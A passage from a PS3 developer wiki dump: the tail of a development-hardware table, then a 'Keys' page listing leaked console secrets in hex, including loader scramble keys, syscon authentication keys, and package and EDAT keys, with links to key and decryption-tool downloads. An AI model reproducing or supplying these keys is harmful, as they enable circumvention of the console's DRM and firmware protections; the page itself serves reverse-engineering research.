[[DEH-R1020]] || Jan/Feb, 2006 || - || TMU-5?? || &lt;span style=&quot;color:green;&quot;&gt;3.2GHz v3.2&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:#E9866A;&quot;&gt;RSX Prototype&lt;/span&gt; || ?&lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; &lt;span style=&quot;color:orange;&quot;&gt;(Protoype)&lt;/span&gt;? || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || {{NO}} || 2x HDMI , AV Multi-Out, VGA || 3 + DEV-Lan || Looks almost like the [[DECR-1000]] || {{DECR}} || ? ||<br /> |-<br /> | [[DEH-R1030]] || Feb/Mar, 2006 || - || TMU-5?? || &lt;span style=&quot;color:green;&quot;&gt;3.2GHz v3.2&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;RSX&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || &lt;span style=&quot;color:orange;&quot;&gt;Prototype&lt;/span&gt; || 2x HDMI , AV Multi-Out, VGA || 3 + DEV-Lan || Looks almost like the [[DECR-1000]] || {{DECR}} || ? || Latest units with a prototype BD-ROM drive (half height, tray loaded) drives and final Cell BE.<br /> |-<br /> | [[DEH-R1040]] || Mar, 2006 || - || [[TMU-520]] || &lt;span style=&quot;color:green;&quot;&gt;3.2GHz v3.2&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;512MB NAND&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;RSX&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;FlexIO&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;128bit 256MB&lt;/span&gt; || &lt;span style=&quot;color:green;&quot;&gt;Final&lt;/span&gt; || 2x HDMI , AV Multi-Out, VGA || 3 + DEV-Lan || Identical to the [[DECR-1000]] || {{DECR}} || 085.010 || First units with a slot loaded drive &amp; bluetooth controller; Hardware is identical to [[DECR-1000]] with a different label/model name.<br /> |-<br /> |}<br /> <br /> '''RSX note:'''<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;7&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! !! SDK &amp;gt;= 090 (MHz) !! SDK &amp;lt;=085 (MHz)<br /> |-<br /> | [[DEH-R1000]](B)&lt;br /&gt;[[DEH-R1010]](B)&lt;br /&gt;[[DEH-R1020]](B) || 420 (core) / 600 (mem) || 420 (core) / 600 (mem)<br /> |-<br /> | [[DEH-R1030]](B)&lt;br /&gt;[[DEH-R1040]] || 500 (core) / 650 (mem) || 500 (core) / 600 (mem)<br /> |-<br /> |}<br /> <br /> '''Pictures:'''&lt;br&gt;<br /> <br /> [http://imgur.com/b7Umx.jpg DEH-R1000/10/20]<br /> <br /> [http://imgur.com/50N5Y.jpg DEH-R1030]<br /> <br /> [http://imgur.com/JeR4W.jpg DEH-R1030/40]<br /> [http://imgur.com/lsGc5.jpg DEH-R1030/40]<br /> [http://imgur.com/722Om.jpg DEH-R1030/40]<br /> <br /> [[:File:Deh-decr-rear.png|DEH-R / DECR rear]]</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Keys&diff=43776 Keys 2017-03-31T09:45:21Z <p>Mathieulh: /* Arcade ATA Decryption Key */</p> <hr /> <div>[http://www.youtube.com/watch?v=wo19Y4tw0l8 Illegal Numbers - Numberphile]<br /> <br /> = Keys Notes =<br /> You can download the keys from: [http://www.ps3devwiki.com/files/devtools/ps3keys/ ps3keys] (or for scetool here : [http://www.ps3devwiki.com/files/devtools/scetool/data/ scetool/data/])<br /> &lt;!--// [https://github.com/search?utf8=%E2%9C%93&amp;q=PS3keys&amp;repo=&amp;langOverride=&amp;start_value=1&amp;type=Repositories&amp;language= ''ps3keys at Github''] / http://www.mirrorcreator.com/files/JSM2FRCD/ps3keys.exe_links [http://www.ps3devwiki.com/files/firmware/MFW-CEX/PS3MFWBuilder/ps3keys.exe ''ps3keys in RAR sfx (254.01 KB)''] / [http://www.mirrorcreator.com/files/EVWOWZES/ps3keys.zip_links ps3keys.zip (229.9 KB)] //--&gt;<br /> <br /> == Location ==<br /> keyfiles should be placed in ~/.ps3 or %userprofile%\ps3keys &lt;br /&gt;<br /> <br /> == Naming ==<br /> naming:<br /> * file prefix: lv0, lv1, lv2, app, iso, ldr, pkg, spp, np<br /> : (NB: some tools use np- others drm-, or npdrm- prefix, uniform naming in all tools is adviced)<br /> * file suffix: .092 .315 .341 .350 .355 .356<br /> : (NB: actually 080, 092, 240, 340, 350, 355, 356, 360, 365, 370 ...)<br /> * key file (erk): %s-key-%s<br /> * iv file (riv): %s-iv-%s<br /> * ctype file (curvetype): %s-ctype-%s<br /> * pub file (public): %s-pub-%s<br /> * priv file (private): %s-priv-%s<br /> <br /> == Key Table Structure==<br /> === generic in loaders ===<br /> Keys are kept in tables and indexed by the sdk_type in the SELF header.<br /> struct key_obj {<br /> uint8_t key[0x20];<br /> uint8_t iv[0x10];<br /> uint8_t pub[0x28];<br /> uint32_t curve_type;<br /> uint32_t always_zero?; // most likely padding: keys must be 16 byte aligned for the crypto routines<br /> }<br /> <br /> === appldr specific ===<br /> typedef struct _appldr_key_container<br /> {<br /> /* start-end (length) */<br /> u8 key[32]; /* 0x00-0x19 (0x20) */ (AES:ERK - 256bit Encryption Round Key) */<br /> u8 iv[16]; /* 0x20-0x2f (0x10) */ (AES:RIV - 128bit Reset Initialization Vector) */<br /> u8 pub[40]; /* 0x30-0x57 (0x28) */ (ECDSA:public - 320bit) */<br /> u32 ctype; /* 0x58-0x5b (0x04) */ (ECDSA:curvetype - 32bit formatted 8bit value) */<br /> u32 null; /* 0x5c-0x5f (0x04) */ (always zero - 32bit formatted) */<br /> /* 0x00-0x5f (0x60) */ (total per revision/type entry - 768bit) */<br /> } appldrKeyContainer;<br /> <br /> appldrKeyContainer rev0x00_0x0c_1[13];<br /> <br /> appldrKeyContainer rev0x00_0x0c_2[13];<br /> <br /> appldrKeyContainer unknown;<br /> <br /> appldrKeyContainer npdrm_1[13];<br /> appldrKeyContainer npdrm_2[13];<br /> <br /> appldrKeyContainer revoke;<br /> <br /> = Curves Notes =<br /> * first &quot;curve&quot; (type 00) is probably reserved (and cannot be used because it's an invalid curve that serves no purpose since it's fully zeroed)<br /> * second curve is ONLY used in kirk CMD 1 parameters (which means that some of the keys/curves from psp were ported to ps3)<br /> * third curve is the most widely used curve and serves the general use purpose<br /> <br /> = Key Scrambling =<br /> Starting with firmware version 3.60 loader keys have been encrypted. Look [http://www.sendspace.com/file/mx21uz here] for a tool that decrypts them.<br /> Besides that, [http://www.sendspace.com/file/ykermj there is] an implementation of the cryptographic algorithm which is used to encrypt/decrypt lv1ldr from lv0 and root scramble key at the SPU side. <br /> <br /> == Root scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key<br /> |-<br /> | root || 3.60-3.61 || &lt;code&gt;844F80F3C57C455C7F09&lt;/code&gt;<br /> |-<br /> | root || 3.65-3.66 || &lt;code&gt;865128F745845947A0CE&lt;/code&gt;<br /> |-<br /> | root || 3.7x || &lt;code&gt;0DAD161222CDDB00A631&lt;/code&gt;<br /> |-<br /> | root || 4.00-4.1x || &lt;code&gt;D029857926C7A918D48E&lt;/code&gt;<br /> |-<br /> | root || 4.20-4.80 || &lt;code&gt;F5FD0DFD54B738FC8895&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scramble keys ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! type !! version !! key1 !! iv1 !! key2 !! iv2<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;5389A6DFA8567D43A80DA6DAB90EE946&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;212E7E92FF1FB75AE5C1323037C34693&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;E37A763FD7A559CFD7E1E2DA5C8CBAC4&lt;/code&gt; || &lt;code&gt;198361A904E748381CB9AA1DF5CCAB17&lt;/code&gt; || &lt;code&gt;23EAD00FC78D9A8B7785EB600124238C&lt;/code&gt; || &lt;code&gt;61B0D045DF5727EFC19E5BE53BE70F14&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;9FD83EA32E9EAA0EF54AD0CFBB60D1DF&lt;/code&gt; || &lt;code&gt;194B649CDA9F4D814CD119C603E49FB5&lt;/code&gt; || &lt;code&gt;A9709BE3E8043BA24635A2617541E9D5&lt;/code&gt; || &lt;code&gt;F06A5B2FEF9CA87B1759DC53AEE1A3B5&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;FFD6342FC86B81F0E56C6867D618D72A&lt;/code&gt; || &lt;code&gt;A51A2C7960AC1BE43AA0FB7695094188&lt;/code&gt; || &lt;code&gt;194922A1EEB01E614884A44D1D7B7FC1&lt;/code&gt; || &lt;code&gt;90AF09A666BB0C663BF2FC8E5338B7B8&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;4DEA657828657CA86AB93E2162592B97&lt;/code&gt; || &lt;code&gt;EEB72FC7E42544C460E78EA30C72D211&lt;/code&gt; || &lt;code&gt;CE2D1A7AA4F4434058F0C8A64400CBF5&lt;/code&gt; || &lt;code&gt;852CC5C6C5D3B7EEB1801147B32E8D21&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;F92C8666EFFBAC7EB583E54A257F7C05&lt;/code&gt; || &lt;code&gt;F2E70BC4BAC10C3D8DDBB7DC23053F9A&lt;/code&gt; || &lt;code&gt;DDF6A5B143C1141FEED01CDA719705C3&lt;/code&gt; || &lt;code&gt;018E695C3A29AF6E746A73CBF73DBDFD&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.65 || &lt;code&gt;546DE455AB15F33546D2296C2535FA44&lt;/code&gt; || &lt;code&gt;ACA9C00DA6D778A95EBD9D76E659C14F&lt;/code&gt; || &lt;code&gt;AB82EF1F62CC382CF2880A870499AE89&lt;/code&gt; || &lt;code&gt;6ECB2AC4DA8D400F0167F1EB9FD8D7F1&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.70 || &lt;code&gt;F98E56F3CB0D68797E3D81F0BE36CFBD&lt;/code&gt; || &lt;code&gt;7DA5A5487AFA3032BF49D40CEBEC2480&lt;/code&gt; || &lt;code&gt;7EAFED452D621269CB7EF46D7BE3DAD9&lt;/code&gt; || &lt;code&gt;A5C6E2A25C2DD09D6597F69EEB3A2CE5&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.11 || &lt;code&gt;80863EDBAE50DD4B16125FC9321BBC24&lt;/code&gt; || &lt;code&gt;1A9E31FEBD603A9CBE4ECD6026292466&lt;/code&gt; || &lt;code&gt;D4E2AA7293192CB1600D537A9E832F2D&lt;/code&gt; || &lt;code&gt;4503E4E505A773C55E0B8E1332341287&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;AC19D5DB427351434DC6DA3BD6E3DE6C&lt;/code&gt; || &lt;code&gt;66E68237D5B7228AA2F057B6043768E1&lt;/code&gt; || &lt;code&gt;466CD2F735628B8EF99D1793063BBB3B&lt;/code&gt; || &lt;code&gt;761907BA41A7945028D8FD8305B25BD2&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;A25E7F097B2FC7B1082032C4387DB335&lt;/code&gt; || &lt;code&gt;0655809B26DF5F29E4E740D950A8CB53&lt;/code&gt; || &lt;code&gt;6B97507247CD680FE56D9E19D06DFC71&lt;/code&gt; || &lt;code&gt;B72B9DBB5C2CC74EB75C7B9815DBD5D8&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;4B973A45A23894CBF0CDFC168B7EFB31&lt;/code&gt; || &lt;code&gt;2210B3103E7EDFD8CE0B25551B1D4003&lt;/code&gt; || &lt;code&gt;858CFE093654E3EFA16FCCE5F73C9591&lt;/code&gt; || &lt;code&gt;481472B4DF63EA5F883DAA2872EE5D2F&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;85AEC67CB85BD04D3E7D3D76AA604FF5&lt;/code&gt; || &lt;code&gt;51B40C084A81C9BE35108FFC0C008F64&lt;/code&gt; || &lt;code&gt;616004C6C2D614737106FE41668826A7&lt;/code&gt; || &lt;code&gt;A765A845AAB477EABFEF4274ADA6AF04&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;020397E6D292288F80659F06E2DACEFB&lt;/code&gt; || &lt;code&gt;4CC9A8A9EED889070F066EC9A7CADA2B&lt;/code&gt; || &lt;code&gt;577BA1CBF1FD40A3EF53C9B5DAC3AC60&lt;/code&gt; || &lt;code&gt;B64BF3D04FBB3F8D29F9E63A97DF3DA9&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;872D02292EE7ED3544AFF20EEA5E6F0C&lt;/code&gt; || &lt;code&gt;2E0CBBD250150410302F7E8B33039EF3&lt;/code&gt; || &lt;code&gt;A02BA1F74446E4BAE04AF5CF13D94154&lt;/code&gt; || &lt;code&gt;2009879EED2F443367C80B62F9D1748F&lt;/code&gt;<br /> |-<br /> | appldr || 3.60 || &lt;code&gt;EE409F8CD0B7F8AF17769D5F6D67EA3F&lt;/code&gt; || &lt;code&gt;6BF7B2D5B0ED87EF4CF601D53EEA111A&lt;/code&gt; || &lt;code&gt;2149690206DD0ABC0CD5367C4AF2C810&lt;/code&gt; || &lt;code&gt;39D8E32CF3F1558902247F733D5284BF&lt;/code&gt;<br /> |-<br /> | appldr || 3.65 || &lt;code&gt;D1FF8A1B7AD27A186B0F1E2FFF5C2B65&lt;/code&gt; || &lt;code&gt;4D5EC61604BCE8250E62600376061878&lt;/code&gt; || &lt;code&gt;8F40C9F3CEF5284F5F432BD906ECDF24&lt;/code&gt; || &lt;code&gt;0B107F57C095B31EF15B95FFEC5134B2&lt;/code&gt;<br /> |-<br /> | appldr || 3.70 || &lt;code&gt;2AF91823CE38598E8D66245F698AB572&lt;/code&gt; || &lt;code&gt;D1A74E3DED98145F023F07FFB60D2B1D&lt;/code&gt; || &lt;code&gt;04BE8DD318D3E7454A166296B022F88D&lt;/code&gt; || &lt;code&gt;16D3B1E7B007FDFE101C029B5F39C761&lt;/code&gt;<br /> |-<br /> | appldr || 4.11 || &lt;code&gt;6BFAFA124D4B88841BCB861364C32826&lt;/code&gt; || &lt;code&gt;3F7679B0A1430C490C1F249EAA468D2C&lt;/code&gt; || &lt;code&gt;4338700B5FA64276DD3E57806ED679FD&lt;/code&gt; || &lt;code&gt;CFCAE1AF6F98E5651CBB021D78DD8F1B&lt;/code&gt;<br /> |-<br /> | appldr || 4.21 || &lt;code&gt;AAF65A91EC372C690969090F59E53C3E&lt;/code&gt; || &lt;code&gt;A5798C254313BC5416951E24EAD3C985&lt;/code&gt; || &lt;code&gt;66BCB417D14A2B592640801C11B7B49B&lt;/code&gt; || &lt;code&gt;2FF236152A4776DAD39B509244E8F5C2&lt;/code&gt;<br /> |-<br /> |}<br /> <br /> == Scrambled keysets ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! Type !! Version !! ERK || RIV<br /> |-<br /> | rvk_prg || 3.60 || &lt;code&gt;FB9CC7277F95F77E63618488AE38DB9C5226D988AF79CC4C0F49EC983FDC96D4&lt;/code&gt; || &lt;code&gt;E06DC9567BE0EA09D5D1A5355B996FC6&lt;/code&gt;<br /> |-<br /> | rvk_prg || 4.21 || &lt;code&gt;1FAED95E0BAB4BD4F9CAF9F9C0DAB5EBEFFB6CDAD6482ABF60DD73B0EA3FD0E8&lt;/code&gt; || &lt;code&gt;30B9F738238A015014A44DD57B3A1661&lt;/code&gt;<br /> |-<br /> | isoldr || 3.60 || &lt;code&gt;7CFE82A405C29EBE20BBA96BB1D1F6E9F31A01BF179018BE26F079808361ECF1&lt;/code&gt; || &lt;code&gt;B3E9683977AE89DE9AFFE6330774505C&lt;/code&gt;<br /> |-<br /> | isoldr || 3.65 || &lt;code&gt;1626B646CC8A8198DAC725CF616C442D855A1E3FBD5824BA9AA36F5FBC345CA0&lt;/code&gt; || &lt;code&gt;2E691E3343A55B99E8A935B0443BD67B&lt;/code&gt;<br /> |-<br /> | isoldr || 3.70 || &lt;code&gt;7DA7D447D0FD4088FFF2B858A266FEFECB3D2E79D68BCC0A70FF8B381258EFA7&lt;/code&gt; || &lt;code&gt;E46F02FDCA9F40CC5CD715D930190FE0&lt;/code&gt;<br /> |-<br /> | isoldr || 4.11 || &lt;code&gt;B2306998F30DEF6750E01674BCA38D46F8FAD1548B456C4F7869296F7DC27E83&lt;/code&gt; || &lt;code&gt;2912F5FC4C4FF400940B369193303D16&lt;/code&gt;<br /> |-<br /> | isoldr || 4.21 || &lt;code&gt;A4609638DC47355D6D7915F26E3837A1A02528AA7A1A27542231997EB4F7143D&lt;/code&gt; || &lt;code&gt;36762D06A6F6FBFFE342D8853A3CD440&lt;/code&gt;<br /> |-<br /> | lv1ldr || 3.60 || &lt;code&gt;18097966C3DE8A0D82BF956CB39FAF782295C6CA7F1E547AB30EDFD7EE5CB812&lt;/code&gt; || &lt;code&gt;9B32B20FA77280F1095EA13F1C2D5C99&lt;/code&gt;<br /> |-<br /> | lv1ldr || 4.21 || &lt;code&gt;189615862C02E6278760BA3A19C8BF0C176B6EDD491A40F2F3ED0091CEFA28C3&lt;/code&gt; || &lt;code&gt;E372B32F7E439D30AC6CEC68CA23D903&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.60 || &lt;code&gt;451E4179EF01987D64EA48841DCA5AA7CB3D6ADB8D880F52DAEF543E654BAE3F&lt;/code&gt; || &lt;code&gt;E8831E56EF9FA4D8D4BF7A6E78025644&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.65 || &lt;code&gt;2A0E7FD3DA4AC74D4AB2DD6AF36FED41CD5F50DECB7FC945F81A85460E141739&lt;/code&gt; || &lt;code&gt;FD9D731564C1D1F0A4258667100D1F17&lt;/code&gt;<br /> |-<br /> | lv2ldr || 3.70 || &lt;code&gt;7E115E8C38BEA057858E97F670EB3E6E2B8FA04C059422CC9273EF12335679B4&lt;/code&gt; || &lt;code&gt;90A06C54C727844AB5300BB6AB54C537&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.11 || &lt;code&gt;ECFAC7BA2F1BFA198A834EBC25B4FBD47448764A6E79A200C26948141A26B794&lt;/code&gt; || &lt;code&gt;CF33BDA9F55C71BD9F38B31162FCB0E3&lt;/code&gt;<br /> |-<br /> | lv2ldr || 4.21 || &lt;code&gt;B0B020CE5DE730AEFCD3778273F0F91456EBCCE8F184FC257D37E0182D20D328&lt;/code&gt; || &lt;code&gt;2D4C6F9F0AAF26A728CA166D03449321&lt;/code&gt;<br /> |-<br /> | edat-key-0 || 4.21 || &lt;code&gt;270C4A349DE7A329BB04FD8642C43591&lt;/code&gt; || <br /> |-<br /> | edat-hash-0 || 4.21 || &lt;code&gt;25790BA9D671FB125E53F013B0F9862E&lt;/code&gt; || <br /> |-<br /> | edat-key-1 || 4.21 || &lt;code&gt;D1DF87B5C1471B360ACE21315A339C06&lt;/code&gt; || <br /> |-<br /> | edat-hash-1 || 4.21 || &lt;code&gt;6D4BF3D7245DB294B6C3F9E32AA57E79&lt;/code&gt; || <br /> |-<br /> |}<br /> <br /> = Key lists =<br /> <br /> == sc_iso module 060.013.r010 - 4.75 ==<br /> 0: <br /> 1: <br /> 2: D413B89663E1FE9F75143D3BB4565274 (060.013.r010 - 4.75)<br /> 2: 73636B65795F7365726965736B657900 (INTERNAL)<br /> 3: FA72CEEF59B4D2989F111913287F51C7 (060.013.r010 - 4.75)<br /> 3: 73636B65795F7365726965736B657932 (INTERNAL)<br /> 4: DAA4B9F2BC70B280A7B340FA0D04BA14 (095.001 - 3.56)<br /> 4: 29C194FFEC1FD14D4AAE006C32B35990 (3.60 - 4.75)<br /> 4: 73636B65795F666F725F6D6173746572 (INTERNAL)<br /> 5: <br /> see also: http://pastie.org/3130817 / http://pastie.org/10206783<br /> <br /> == sb_iso_spu_module 083.006.r010 / 1.02 ==<br /> 0: 8E73EE9994E8A11C12300C34DA92D07FD8636E434C8FCA02 &lt;- sb_iso_magic_px<br /> 1: 9D013CBE2D46368B4DB782FF2472ECE64237F3538827416E &lt;- sb_iso_fix2_px<br /> 2: 086998B739554A8022372B883465DE5F718FC15DEE636447 &lt;- sb_iso_fix1_px<br /> 3: 534740F254E3F83503BBD7DE9F091B67325F31A00C78F2A9 &lt;- sb_iso_magic_dx<br /> 4: B62AB069608519CC7F69FC16D673ED085998A24A40B06AFF &lt;- sb_iso_fix2_dx<br /> 5: 8094270BA87742F383F109F9C7D9E9755C4E343D81D2A3D9 &lt;- sb_iso_fix1_dx<br /> <br /> == sb_iso_spu_module 3.41 ==<br /> 6: C51272E64D9A15CA445CD2F3795C15B81B192C7AC15883F4<br /> 7: E618B3A4EC2789DAFC2ED2DFED75A93FA7B55AEA201278A4<br /> 8: D7C0AC46B1CD3E7345A0F0DAF921F6DDDA03A37905FBB17E<br /> 9: E3F22665AFC4E1C014A431241DBC0B69D5D66857D91E6B27<br /> A: 66866AF7489AE85ABF98A670AA27672E066E60D14D524121<br /> B: EB9706B9A75A48853BD4035ADE936E050E87E742D27A8609<br /> note: 1.02 contains 6 keys, 3.41 contains 12 keys (it also includes the 1.02 keys)<br /> <br /> <br /> == sv_iso_spu_module 095.001 - 3.55 ==<br /> key_0: EF4F6A107742E8448BC1F9D8F2481B31 //key_0 is an aes_cfb128 iv<br /> <br /> iv_0(giv): 2226928D44032F436AFD267E748B2393<br /> key_0_0(kms1): 126C6B5945370EEECA68262D02DD12D2 //key_0_0 is used with iv_0 to generate gen_key_0<br /> key_0_1(kms2): D9A20A79666C27D11032ACCF0D7FB501 //key_0_1 is used with iv_0 to generate gen_key_1<br /> <br /> key_1(Kwm): 7CDD0E02076EFE4599B1B82C359919B3 //key_1 is used with iv_0<br /> <br /> iv_1(ivs_aes): 3BD624020BD3F865E80B3F0CD6566DD0 //iv_1 is used with gen_key_0 and gen_key_1<br /> <br /> key_2(Kh): 380BCF0B53455B3C7817AB4FA3BA90ED //key_2 + iv_2 are used to generate something from the disk name (id?)<br /> iv_2(IVh): 69474772AF6FDAB342743AEFAA186287<br /> <br /> debug_disc_fallback: 67C0758CF4996FEF7E88F90CC6959D66 //this fallback is used if the disk name (id?) is 'PS3_L_DEBUG_DISC' (used on PS3 and PS4?)<br /> <br /> ivs_3des: E80B3F0CD6566DD0<br /> <br /> eid4_fallback_0x00 FF1471C135E4593D0D27F9CAA3795BD9<br /> eid4_fallback_0x10 DD38369F0175173CE32BEED051FD4EF3<br /> <br /> eid4_fallback keys added from this [http://www.ps3-hacks.org/ps3-scetool-friday-isolated-spu-poc-and-eidtool-wip-updates.html source]<br /> <br /> trivia(you can find these in the middle of the keys) http://pastebin.com/mWxb3Zxj<br /> <br /> == spu_token_processor ==<br /> 095.001 - 3.56:<br /> token-hmac: CC30C4229113DB25733553AFD06E8762B3729D9EFAA6D5F35A6F58BF38FF8B5F58A25BD9C9B50B01D1AB4028676968EAC7F88833B662935D7506A6B5E0F9D97A<br /> token-key: 341812376291371C8BC756FFFC611525403F95A8EF9D0C996482EEC216B562ED<br /> token-iv: E8663A69CD1A5C454A761E728C7C254E<br /> 3.60-{{latest}}:<br /> token-public: A55476C9E6DFB890FAAF5FBFFD961B649D0ABF1D0CD76000BD4B5F5AFE0AB87DCEA221E252A37404<br /> token-curve-type: 0x9<br /> <br /> 08x - ???{{SD}}<br /> token-hmac internal: 646AC0DF49C333626C15F9C7CCDAE62DD882FBD223647AF41776E14D35984538CC525636330272EF7F26D883FB7041B44C2925485F9570F04DA2D18B7DA4CF1B<br /> token-key internal: 8801A471102853DC867247974B68F9361EAD861C3A09346FEF25FE36D15751CA<br /> token-iv internal: FEA685F720B0C60A65DC97B8B2C8BCB3<br /> <br /> == spu_utoken_processor 3.55 ==<br /> utoken-hmac: 572C987747A4A0A6A1E715963D0DCCCA28A8A94B5B529472EF1A4EFFEB2978F99BD0A9D42438DB731B443C9DC7944A13AC7B40FCA57DFE33D212FBA86CBEBCBA<br /> utoken-erk: D1CB1C81ACE35F3D970DDE723A622935516F98D0F0DB3E151DE2B7A2E34BD736<br /> utoken-iv: A6523E5426470953FE8C90F61BCA927A<br /> <br /> == sc_iso ==<br /> secure_com_lib_internal_key::BE_SC_PayloadKey: A3ADB99A21E47ADFF3FD7FC3173981CA # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::SC_BE_PayloadKey: 6933CEE7A518E5B8CBE1FC14B261B765 # 060.013.r010 - {{latest}}<br /> secure_com_lib_internal_key::FactoryInit_Password : 2EA267093B4556ED9D3BE62E115D6D59 # 060.013.r010 - 1.70<br /> sc_key::old_auth_key_1_0x00 : 13163A92B50513542C18ABAD31B85FB7<br /> sc_key::old_auth_key_2_0x00 : 2BC8BB73F4B59AC658A737A5DD535DFE<br /> sc_key::old_auth_key_1_0x01 : D6C374FCDFF8C3CF44018C78733BF5B2<br /> sc_key::old_auth_key_2_0x01 : 648B9FF94EF321C69A4AE596F2F08D22<br /> sc_key::old_auth_key_1_0x06 : 626C7124FC5BA1AF7436389BA37C6654<br /> sc_key::old_auth_key_2_0x06 : 9D94BE461CAF083C9D9FA185C93AEE7B<br /> sc_key::key_for_master : 73636B65795F666F725F6D6173746572<br /> sc_key::series_key : 73636B65795F7365726965736B657900<br /> sc_key::series_key2 : 73636B65795F7365726965736B657932<br /> <br /> == gpkg-key ==<br /> ps3_gpkg_key: 2E7B71D7C9C9A14EA3221F188828B8F8<br /> &lt;!--//u8 retail_pkg_aes_key[] = {0x2E,0x7B,0x71,0xD7,0xC9,0xC9,0xA1,0x4E,0xA3,0x22,0x1F,0x18,0x88,0x28,0xB8,0xF8};//--&gt;<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x361F6@elf file.<br /> psp_gpkg_key: 07F2C68290B50D2C33818D709B60E62B<br /> * Location: nas_plugin.sprx , from fw3.55cex: sub_36EEC, offset: 0x3724A@elf file.<br /> <br /> == service mode dongle HMAC ==<br /> 46DCEAD317FE45D80923EB97E4956410D4CDB2C2<br /> <br /> == PUP HMAC ==<br /> F491AD94C6811096915FD5D24481AEDCEDEDBE6BE513724DD8F7B691E88A38F4B5162BFBECBE3A62185DD7C94DA2225ADA3FBFCE555B9EA9649829EB30CE8366<br /> <br /> == DAT ==<br /> dat-iv: 3032ADFCDE09CFBFF0A3B3525B097FAF<br /> dat-key: 2B7E151628AED2A6ABF7158809CF4F3C<br /> <br /> == EDAT ==<br /> edat-cypher-key-0: BE959CA8308DEFA2E5E180C63712A9AE<br /> edat-cypher-key-1: 4CA9C14B01C95309969BEC68AA0BC081<br /> edat-hasher-key-0: EFFE5BD1652EEBC11918CF7C04D4F011<br /> edat-hasher-key-1: 3D92699B705B073854D8FCC6C7672747<br /> <br /> == SDAT ==<br /> sdat-key: 0D655EF8E674A98AB8505CFA7D012933 (sdat-sha1: ED2A015EEB1BD0CE06D0447F1A22AF4C1C401E4A)<br /> <br /> == PS3 Minis ==<br /> ps3minis1: D6606A6B2499CBDA5FA09081C5CDBD8A (SHA1: F72D80C2386010667F8A75DEB026A011D5ABA570)<br /> ps3minis2: 625E777946626A37336E3A5D4A6B714B (SHA1: C218DAFEC53C8DEAAC9A9E3D2B9C1C6A48371F9F)<br /> <br /> Note: for minis iso.bin.edat<br /> <br /> == aim keys ==<br /> aim_ks_4 : 30B0395DC5835AAA3A7986B44AFAE684 &lt;- idps_magic10<br /> aim_ks_1 : 2ED7CE8D1D55454585BF6A3281CD03AF &lt;- idps_magic<br /> aim_iv : 51F78B72A64711CF5C72323FB8607A00 &lt;- magic_iv0<br /> aim_key : 922B198CDF0C07DCCE848B69882D804CC23F19C2EAE1244F35AF176F7FD37851 &lt;- magic_key0<br /> aim_compare : 401C4AA63B2C8D44E245F074DAE7782A 360D1E8EE2116BDF6F0D8A3CC17BE38F EA48B571F4D26DED0000000000000000 (1.00-3.42)<br /> http://pastie.org/2547291<br /> (ks version depends on the first four bytes of the eid) &lt;br /&gt;<br /> aim_compare-&gt;magic_0(note that there's magic_1 and magic_2 also on really old firmwares)<br /> <br /> == mode_auth_data == <br /> key : FEDCBA98765432100123456789ABCDEFFEDCBA98765432100123456789ABCDEF<br /> iv : 0123456789ABCDEFFEDCBA9876543210<br /> hmac_key : 123DA14B3D21D82AFC759A9CF6F41610A24EC8704306BAC4E0941A5B70EEA037<br /> F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872F1482EA7EC578872<br /> magic : 52796F7461726F206973206375746521 (Ryotaro is cute!)<br /> http://pastie.org/4155189<br /> <br /> (Product Mode authentication data)<br /> <br /> == SYSCON_MANAGER_KEY ==<br /> <br /> D413B89663E1FE9F75143D3BB4565274<br /> <br /> 